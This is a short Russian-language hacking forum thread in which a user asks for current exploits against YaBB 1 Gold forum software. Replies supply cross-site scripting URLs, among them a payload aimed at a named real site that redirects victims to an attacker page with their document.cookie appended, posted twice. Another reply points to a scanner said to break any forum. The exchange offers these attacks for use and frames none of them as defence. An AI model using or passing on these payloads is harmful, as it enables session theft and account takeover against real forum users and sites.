Просмотр полной версии : Уязвимости форума YaBB 1 Gold - Release и сплойты к нему
Народ,хотелось бы узнать какие последние уязвимости этого форума есть и сплойты к нему?
А то по phpBB куча всякой инфы,а по YaBB 1 Gold я нашел мало,да и то какое то старье.
Может,кто что новое подскажет?
Romaxa55
05.01.2006, 07:26
Да, там можно межсайтовый скриптинг произвести, вот пример:
http://host/cgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert()</script>
http://www.area51experience.com.ar/foro/YaBB.pl?board=gral;action=display;
num=10360245269<Script>location%3d'Http://url/x.php?Cookie%3d'
%2b(document.cookie)%3b</Script>
P.S. прошу прощения за флуд.
http://www.area51experience.com.ar/foro/YaBB.pl?board=gral;action=display;
num=10360245269<Script>location%3d'Http://url/x.php?Cookie%3d'
%2b(document.cookie)%3b</Script>
Эт ты где такую урлу надыбал?) :)
Romaxa55
05.01.2006, 21:53
Эт ты где такую урлу надыбал?) :)
на секьюре лежала, там и надыбал, ведь он же не сообщил какой сайт именно, попросили уязвимости,Ю я и сообщил.
Народ,хотелось бы узнать какие последние уязвимости этого форума есть и сплойты к нему?
А то по phpBB куча всякой инфы,а по YaBB 1 Gold я нашел мало,да и то какое то старье.
Может,кто что новое подскажет?
http://forum.antichat.ru/thread11807.html
Возьми от сюда мануальный сканер, и проскань этот форум. Ни один форум еще от этого сканера не был защищен.
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot